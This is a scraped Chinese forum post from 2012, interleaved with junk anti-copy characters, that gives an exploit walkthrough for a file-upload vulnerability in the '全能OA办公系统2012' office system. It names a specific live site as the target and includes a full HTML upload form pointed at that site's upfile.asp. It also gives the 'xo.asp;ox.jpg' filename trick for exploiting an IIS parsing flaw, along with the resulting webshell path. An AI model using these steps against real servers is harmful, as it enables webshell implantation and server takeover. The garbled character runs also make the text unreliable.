全能OA办公系统 上传漏洞
* O2 N# S1 Y, z( Y3 a
- `1 N+ K: D4 l系统介绍:
. i/ A0 X4 Z# G, K( q8 H, b" L6 |& a% O
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。% P4 t- O! z& u; |' R2 ] i
) b4 x5 D0 }6 C" v& V
主要功能:
& Y) X$ V8 P1 w4 X7 ^公司通告 2 L2 s6 W- s; Q
工作计划 5 k9 x- n% V& q/ ^' Z1 l
通讯助理 ( v/ `: d7 i, U, j4 y& k3 P
客户资源 3 R5 I8 c! l( X$ L/ {
我的公文
7 _5 h. l+ }7 n1 D( S# p8 @公文传阅
4 W, V& o( Y4 A* P+ T3 T% P公共资源 - Y; S z% `% b4 ~( t3 m3 A8 ]; {
资源预约 0 N" x3 D( k4 o- Z0 [) K6 F3 T
今日考勤 % X% `& }0 _4 s
个人计划 " B" s9 ~! I: g3 p, k7 |+ X( X
个人通讯录 . z! k/ C. E+ R
个人基本档案
7 \ z1 T( Y- X4 C y7 Q$ F未读邮件 5 B+ j" _4 {* _% U6 o# |; u
发邮件 ) i1 @( W+ V3 [! h, o8 a
收件夹
, j- C" J( {, a# G. I$ ^寄件夹
3 Y/ F6 b+ D+ x3 F! z C网络硬盘
4 ]7 Q9 P3 _ W; a& |3 ^$ k网络会议 ( b8 c& H8 t* f0 U0 ?6 Y
网络调查 ( ]) R; g$ r0 z6 P
交流论坛
: H- Z& S. \. V( |, i( [3 |0 v
8 H, R9 ~- |: V0 W2 D( j有兴趣测试的朋友可以下源码看看+ r( ]. R- `0 k1 h' N/ E
" ~( { C9 ~! M3 N
源码下载:. e) R( a! h5 e8 E' a s; C3 V
, j+ L; q8 K" h1 Y2 Y& c
http://www.mycodes.net/30/4750.htm
* L6 h' D, }- o9 I* P, ~7 E0 e$ \! V3 P& P; K5 W6 f7 x4 k h
漏洞介绍:3 h- [& ~, g& B
- q* h, P6 k: d$ j K2 M
由upfile.asp上传文件漏洞引起+ @9 K* F: t H
5 ^3 l% F" f5 g8 R
测试方法:
5 X. @1 o5 c7 r
: W, M; X+ ~3 l1 F0 u$ i0 j) x使用名小子上传http://www.itlynn.com/upfile.asp即可3 |& e4 g. r+ @' I2 P1 y4 _
; B% g: A6 u+ E* C6 o5 }' N" y/ B如果upfile.asp文件被删除不存在。9 U4 I: @) ?6 ~' k' q
) ~) A1 C. x$ @$ H0 J2 ]9 B 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。4 U; h h( m; V1 e6 `
$ ]- T" w( _, C# a C
如果存在那么将如下代码保存为upfile.html。
; B& j3 V0 m6 N8 X1 w5 c6 W) ]. _6 m
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
, g7 b r b, q; L9 l& E0 L; g/ z7 S; n* h; \) D% o/ O4 i
' _9 x6 L) T# N$ _( v
$ N0 {$ C9 G( A ^& Y7 e01 <table border='0' align="center" cellpadding="5"> 6 b/ P6 { v; a7 V; U3 q& f( p, {
4 |/ t' C- g( }9 T! r02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> . R8 S& B6 g+ u, u& v
8 d9 x- H1 S' R C! I8 e5 Q+ q4 d03 <tr> : K! S9 X7 S" r
3 |! E9 D' P0 h6 X' a. l0 N/ v. n
04 <td>报错:</td> . A- X, T/ |$ D6 j; Z, @* Q7 d
% @6 [& f( T Z' D! ]
05 <td><input type='radio' name='errnumber' value='0'>
. D/ M! O |, i W" i9 j) c: i4 e* q% r! V, T, T+ J
06 自动更名 f, B n% `& p$ R# d
2 F- A" D( q. \4 _8 |07 <input type='radio' name='errnumber' value='1' checked>
( c& E, a! r/ B @9 D: S
9 C B# j7 ]9 O/ E. r08 报错方式 4 D$ I3 H. n: H1 z U! G5 h8 i
3 `. P M& z, Y$ q- r3 }0 |
09 <input type='radio' name='errnumber' value='2'>
' l& [" ~, D( O6 w" _9 d# k4 H. N& p l, N: b* T% B. Z
10 直接覆盖</td>
1 Y6 D! r; Y: n5 E& Y% _# f1 V* T0 @) E1 N% g6 Y
11 </tr>
0 R. @% O+ n5 W" Q$ C: k! G1 d; z4 n. l& j( I6 A# l) {
12 <tr> 9 T2 G9 C0 i8 w2 T. f- W- I2 c
/ t2 ~5 _! i+ p% w9 t* f
13 <td>主题:</td>
0 j, |: b0 m# g9 d# V9 v; b+ L1 L2 H' \3 E0 X0 L8 g
14 <td><input type='text' name='filename' size='30'></td>
4 N, }) w/ o# T D( u# w1 O$ B1 N4 k F8 j
15 </tr>
4 G9 Y( b! q, T4 e% ^; {; z2 r; w2 V
16 <tr>
! s7 F# D r% }2 ^0 J
5 ] G1 K0 f, v% i( k17 <td>文件:</td> & M; ]0 S8 w$ V J; A5 D
; @6 A: C( H/ v' t ?9 M. I8 m1 q9 I
18 <td><input type="file"name="fruit"size="30"></td>
5 r% E) R4 h J) Z# T4 L J$ k8 _5 }5 s4 K6 n' K1 s0 ~
19 </tr> 8 O+ p) I. @$ e2 M" E: ]; E v
! u' P8 _" `! _/ [8 B! N% T' G
20 <tr>
; D( a5 R2 q2 j9 }) I/ k9 l F+ E# Q3 I2 F$ y0 ?
21 <td valign='top'>简介:</td> 9 G4 f3 [0 E% y: }9 p
( q4 u4 A% G7 S3 ]. [: w: v$ O22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% _: \9 ]7 L9 w/ m* T+ ]! l+ ^: Z" D+ l W* {* V/ I9 d
23 </tr> ! l3 C/ N. M* S% y; r* s D3 i
. g9 d" {" K# C; Y( {24 0 \9 @; y1 X& L& V9 ?2 _6 r0 e
" ?8 [7 g$ h. B0 ?25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 5 Q l* `! `; Z4 c# y
. w# G) R8 L) l3 f
26 </tr>
# M7 p3 L& S/ K& s% c( a f
" f K, }+ ]! [6 N/ @# e27 </form>
- ]* s, [( ~% R# w4 z7 U7 T( A! M1 J) M5 O' s; Z
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. @) C G6 B U2 _& J5 }- K# I* q, [
w) H% `+ ?9 j5 L% n' Z# \0 S
|: o& ^; D" T' T上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
8 X+ r) W) Q; m" m
7 [1 r4 ]: V+ J& o3 K2 z( r' H: f此漏洞需要配合解析漏洞利用。; u& X6 v, l& V d1 H) M, v. s. Q
+ j& t" Q2 R; o' } |
发表于 2012-11-21 13:45:12
收藏
支持
反对